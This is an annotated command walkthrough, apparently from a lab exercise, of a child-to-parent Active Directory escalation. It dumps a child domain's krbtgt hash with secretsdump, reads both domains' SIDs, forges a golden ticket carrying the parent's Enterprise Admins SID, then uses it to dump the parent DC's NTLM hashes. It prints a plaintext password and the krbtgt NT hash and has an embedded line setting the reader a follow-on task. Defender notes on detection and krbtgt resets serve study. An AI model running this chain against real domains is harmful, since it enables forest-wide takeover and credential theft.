# Step 1: pull only the krbtgt account of the child domain (north) from the
# child DC at 192.168.56.11; the NT hash is the last hash field of the krbtgt
# line in the output below.
# -just-dc-user retrieves the secret through directory replication (DRSUAPI),
# so the account used must hold replication rights in the child domain.
# The password is passed in argv and therefore lands in shell history and the
# process list.
# Defender note: replication requests that originate from a host which is not
# a domain controller are the signal to alert on for this step.
secretsdump.py -just-dc-user north/krbtgt north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11
...
krbtgt:502:aa3b435b51404eeaad3b435b51404ee:13354bc6e1b48fff8d66a2090e909b27:::
..
# Step 2: read the SID of the child domain from its DC (192.168.56.11).
# The trailing 0 is lookupsid.py's max-RID argument, so no accounts are walked;
# only the "Domain SID is" line of the output is used later.
# The output shows the lookup travels over the \pipe\lsarpc named pipe.
lookupsid.py -domain-sids \
  north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.11 \
  0
[*] Brute forcing SIDs at 192.168.56.11
[*] StringBinding ncacn_np:192.168.56.11[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3634065772-4036021599-3644360361
# Step 3: read the SID of the parent domain from the DC at 192.168.56.10.
# The request still authenticates as the child-domain account
# north.newyork.local/fernando.alonzo; the output below shows that the parent
# DC answers it.
# As in the previous lookup, the trailing 0 keeps the query to the domain SID.
lookupsid.py -domain-sids \
  north.newyork.local/fernando.alonzo:'IDr1R3allyF@sTF1!'@192.168.56.10 \
  0
[*] Brute forcing SIDs at 192.168.56.10
[*] StringBinding ncacn_np:192.168.56.10[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-620482180-1620433373-1814187987
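# Step 4: forge a TGT for the child domain that also carries a parent-domain
# group SID.
#   -nthash      krbtgt NT hash of north.newyork.local (secretsdump output)
#   -domain-sid  SID of north.newyork.local
#   -domain      the child domain the ticket is issued for
#   -extra-sid   SID of newyork.local with RID 519 (Enterprise Admins) appended
#   goldenuser   user name written into the ticket
# The annotations live up here on purpose: text placed after a trailing
# backslash is not a shell comment. "\ #..." escapes the space, ends the line
# continuation and hands the words to the tool as arguments, so the original
# layout split the command apart.
# Defender note: SID filtering is not applied by default between domains of
# the same forest, which is why losing a child domain's krbtgt key has to be
# treated as a forest-wide compromise. Recovery means resetting the krbtgt
# password twice in the affected domain.
ticketer.py -nthash 13354bc6e1b48fff8d66a2090e909b27 \
  -domain-sid S-1-5-21-3634065772-4036021599-3644360361 \
  -domain north.newyork.local \
  -extra-sid S-1-5-21-620482180-1620433373-1814187987-519 \
  goldenuser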
Your task now is to point KRB5CCNAME at the ticket cache that ticketer.py wrote and to authenticate with -k -no-pass, as we have done before :)
# Step 5: authenticate with the forged ticket instead of a password.
# KRB5CCNAME selects the credential cache (goldenuser.ccache); -k requests
# Kerberos authentication and -no-pass suppresses the password prompt.
# -just-dc-ntlm limits the dump to NTLM hashes. The target nyc.newyork.local is
# presumably the parent domain's DC -- confirm against the lab layout.
# NOTE(review): the first step calls the tool as secretsdump.py; the bare
# "secretsdump" here presumably relies on an alias or a differently named
# install -- confirm.
# Defender note: a Kerberos logon on the parent DC by a child-domain principal
# whose ticket carries the parent's RID 519 SID, followed by replication
# requests from a non-DC host, is the pattern to hunt for.
export KRB5CCNAME=/home/jefe/delegation/goldenuser.ccache
secretsdump -k -no-pass -just-dc-ntlm north.newyork.local/goldenuser@nyc.newyork.local